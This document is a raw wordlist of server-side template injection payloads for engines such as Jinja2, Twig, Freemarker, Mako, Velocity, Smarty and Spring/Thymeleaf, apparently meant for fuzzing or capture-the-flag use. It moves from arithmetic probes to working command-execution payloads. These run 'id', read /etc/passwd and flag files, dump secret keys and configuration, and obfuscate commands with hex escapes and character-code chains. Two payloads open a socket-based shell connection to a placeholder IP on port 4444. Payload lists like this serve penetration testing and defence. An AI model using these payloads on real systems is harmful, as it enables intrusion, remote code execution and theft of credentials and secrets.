${{<%[%'"}}%\ {{7*7}} ${7*7} <%= 7*7 %> ${{7*7}} #{7*7} {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\ [7*7]#execInfo #execInfo.templateStack #execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null) #{42*42} $context.TOOLS_VERSION $context.keys $field.in("org.apache.velocity.runtime.RuntimeConstants") $field.in("org.apache.velocity.runtime.VelocityEngineVersion") $smarty.config $smarty.template $smarty.version ${42*42} ${donotexists|42*42} .current_template_name .locale_object .version 42*42 <%=42*42 %> ERB.version() [[${42*42}]] _context _context|keys|first _context|length _self _self.getTemplateName().__toString constant('Twig_Environment::EXTRA_VERSION') constant('Twig_Environment::VERSION') constant('Twig_Environment::VERSION_ID') execInfo execInfo.templateStack execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null) global globals() locals locals() self self._TemplateReference__context settings settings.DATABASES settings.DEBUG settings.SECRET_KEY {42*'42'} {42*42} {^xyzm42}1764{/xyzm42} {{42*42}} {{=42*42}} {{{42*42}}} {{4*4}}[[5*5]] {{7*'7'}} <%= 7 * 7 %> ${3*3} @(1+2) #{3*3} #{ 7 * 7 } {{dump(app)}} {{app.request.server.all|join(',')}} {{config.items()}} {{ [].class.base.subclasses() }} {{''.class.mro()[1].subclasses()}} {{ ''.__class__.__mro__[2].__subclasses__() }} {% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %} {{'a'.toUpperCase()}} {{ request }} {{self}} <%= File.open('/etc/passwd').read %> <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} ${"freemarker.template.utility.Execute"?new()("id")} {{app.request.query.filter(0,0,1024,{'options':'system'})}} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} {$smarty.version} {php}echo `id`;{/php} {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}} {{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} {{request|attr(["_"*2,"class","_"*2]|join)}} {{request|attr(["__","class","__"]|join)}} {{request|attr("__class__")}} {{request.__class__}} {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} ${T(java.lang.System).getenv()} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")} ${self.module.runtime.util.os.system("id")} ${self.template.module.cache.util.os.system("id")} ${self.module.cache.compat.inspect.os.system("id")} ${self.__init__.__globals__['util'].os.system('id')} ${self.template.module.runtime.util.os.system("id")} ${self.module.filters.compat.inspect.os.system("id")} ${self.module.runtime.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.util.os.system("id")} ${self.template.__init__.__globals__['os'].system('id')} ${self.module.cache.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.util.os.system("id")} ${self.template.module.cache.compat.inspect.os.system("id")} ${self.module.cache.compat.inspect.linecache.os.system("id")} ${self.template._mmarker.module.runtime.util.os.system("id")} ${self.attr._NSAttr__parent.module.cache.util.os.system("id")} ${self.template.module.filters.compat.inspect.os.system("id")} ${self.template.module.runtime.compat.inspect.os.system("id")} ${self.module.filters.compat.inspect.linecache.os.system("id")} ${self.module.runtime.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.exceptions.util.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} ${self.context._with_template.module.cache.util.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.template.module.cache.util.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.util.os.system("id")} ${self.module.cache.util.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.util.compat.inspect.os.system("id")} ${self.module.runtime.util.compat.inspect.linecache.os.system("id")} ${self.module.runtime.exceptions.traceback.linecache.os.system("id")} ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} ${self.template._mmarker.module.cache.compat.inspect.os.system("id")} ${self.template.module.cache.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} ${self.template._mmarker.module.filters.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} ${self.template.module.filters.compat.inspect.linecache.os.system("id")} ${self.template.module.runtime.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} ${self.context._with_template._mmarker.module.cache.util.os.system("id")} ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.cache.compat.inspect.os.system("id")} ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} ${self.context._with_template._mmarker.module.runtime.util.os.system("id")} ${self.context._with_template.module.filters.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.compat.inspect.os.system("id")} ${self.context._with_template.module.runtime.exceptions.util.os.system("id")} ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} {{self._TemplateReference__context.cycler.__init__.__globals__.os}} {{self._TemplateReference__context.joiner.__init__.__globals__.os}} {{self._TemplateReference__context.namespace.__init__.__globals__.os}} {{cycler.__init__.__globals__.os}} {{joiner.__init__.__globals__.os}} {{namespace.__init__.__globals__.os}} {{namespace.__init__.__globals__.os}}${{<%[%'"}}%\ [7*7]#{ 3 * 3 } ${6*6} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ${{3*3}} *{7*7} *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} <%= 3 * 3 %> @(6+5) {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"/etc/passwd\"]);'").read().zfill(417)}}{%endif%}{% endfor %} {{''.__class__.mro()[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}} {{'a'.toUpperCase()}} {{2*2}}[[3*3]] {{3*'3'}} {{3*3}}